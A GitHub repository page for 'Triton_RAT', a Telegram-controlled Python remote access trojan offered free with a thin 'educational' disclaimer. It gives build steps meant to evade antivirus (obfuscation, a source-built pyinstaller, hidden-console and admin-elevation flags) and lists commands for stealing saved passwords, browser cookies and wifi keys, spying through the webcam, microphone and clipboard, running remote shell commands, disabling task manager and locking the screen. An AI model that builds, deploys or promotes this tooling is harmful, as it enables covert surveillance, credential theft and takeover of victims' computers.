Skip to content

Completely free Telegram integrated RAT, Triton_RAT is one of the best RAT's that was written in python. Good luckπŸ˜‰!

License

Notifications You must be signed in to change notification settings

WhiteeRabbit/Triton_RAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

23 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Triton_RAT

Triton_Remote_Administration_Tool

TRITON

Hi πŸ‘‹, I'm WhiteeRabbit

I wrote RAT in python that works with telegram!

The best rat that works with telegram!

This tool was created for educational purporses only! I'm not responding for your action!

🎯 About

With this tool you can control with YOUR pc remotly using telegram That you need only hand (2 optional) , exe file that you will get from pyinstaller and telegram account

Let's get started!:

Download python!

python

Bot Password (when you entering /help or /start) : acd

🏁 Starting

# Register account in telegram
# Create bot with botfather


# Download this project

$ Download pyinstaller from https://github.com/pyinstaller/pyinstaller
# because most antiviruses will detect as virus pyinstaller from original pip version
# if you downloaded pyinstaller from pip like pip install pyinstaller
# Delete that 

# Download requiremets.txt
$ pip install -r requirements.txt

# change bot api in python file to your own bot
$ bot = telebot.TeleBot('your api token')

# !MAIN STEP! obfuscation will help to deceive antiviruses
$ to obfuscate that script copy full code and paste it in https://freecodingtools.org/py-obfuscator
$ https://freecodingtools.org/py-obfuscator
# Of course you can use another obfuscators but i like that obfuscator (this is not an advertisement)

# after downloading pyinstaller run:
$ pyinstaller --onefile --noconsole --uac-admin --hidden-import telebot --hidden-import pyautogui --hidden-import cv2 --hidden-import json --hidden-import base64 --hidden-import sqlite3 --hidden-import win32crypt --hidden-import Cryptodome.Cipher.AES --hidden-import shutil --hidden-import datetime --hidden-import numpy --hidden-import pyaudio --hidden-import wave --hidden-import random --hidden-import browser_cookie3 --hidden-import pyttsx3 Triton_Rat_Release.py



# wait for building exe

$ run exe and bot started! 

You can use:

    βš”οΈ/start - start the program
    βš™οΈ/help - help with commands
    πŸ”Œ/addstartup - to add autostart
    πŸ§‘πŸ»β€πŸ’»/users - show users in pc
    πŸ”‘/passwords - show saved passwords in pc
    πŸͺ/robloxcookie - show roblox cookies
    πŸͺͺ/info - to show information about pc ,also location , country, city , ip
    πŸ–₯️/whoami - to show name of pc
    πŸ’¬πŸ‘‚πŸ»/textspech 'your text' - your text will sounded in pc
    🎡/playsound 'file path' -(first run /upload to upload your music file in pc) your file will sound in pc for ex: /playsound C:\test.mp3
    πŸ”«/execute - execute shell commands (like terminel emulator in netcat)
    πŸ—‘οΈ/e 'your command' - also execute shell commands
    🏹/ex 'your command' - use this if you will execute commands with long response 
    πŸ“·/screenshot - to get screenshot
    πŸ“Ή/webscreen - get screenshot from camera
    πŸŽ™οΈ/mic 'time in seconds' - record microphone of pc
    ☒️/winblocker - my own winlocker
    ☣️/winblocker2 - if winblocker doesnt work
    πŸ“/download 'your file' - to download files(for exm: /download C:\test.txt)
    πŸ—ƒοΈ/upload - to upload file in target pc
    πŸ“‹/clipboard - show users clipboard
    🎦/webcam - get webcam video
    πŸŽ₯/screenrecord - get screenrecord
    🌐/chrome 'website url' - open website in chrome in target pc
    🌐/edge 'website url' - open website in edge in target pc
    🌐/firefox 'website url' - open website in firefox in target pc             
    Ⓜ️/msg 'your message' - send message(messagebox) to target
    πŸ’£/spam 'your message' - spam your message 10 times but if you will click al lot...
    πŸ›œ/wifilist - show saved wifi
    πŸ”/wifipass 'name of accespoint' - show password of saved wifi
    πŸ–±οΈ/mousemesstart - start mouse messing
    🐁/mousemesstop - stop mouse messing
    πŸͺ€/mousekill - disable mouse
    🐭/mousestop - enable mouse
    πŸ”Š/fullvolume - make full volume
    πŸ”‰/volumeplus - make pc volume + 10
    πŸ”‡/volumeminus - make pc volume - 10
    πŸͺ¦/disabletaskmgr - disable task manager
    πŸ“ /enabletaskmgr - enable task manager
    🧱/wallpaper - change desktop's wallpaper
    ⌨️/keypress 'your key' - in pc's keyboard will pressed this keys 
    ⌨️/keypresstwo 'your key' 'your key' - in pc's keyboard will pressed this keys 
    ⌨️/keypressthree 'your key' 'your key' 'your key' - in pc's keyboard will pressed this keys 
    πŸ“ƒ/tasklist - to show tasks
    🧨/taskkill 'your task' - kill entered task
    πŸ•ΆοΈ/hide - to hide your app
    πŸ‘“/unhide - unhide your app
    πŸ’€/sleep - send windows to sleep
    πŸ•š/shutdown - shutdown pc
    πŸ”„οΈ/restart - restart pc

Antivirus check

Π‘Π½ΠΈΠΌΠΎΠΊ экрана (21)

πŸ“ License

This project is licensed under the MIT License. For more details, please refer to the LICENSE file.

About

Completely free Telegram integrated RAT, Triton_RAT is one of the best RAT's that was written in python. Good luckπŸ˜‰!

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages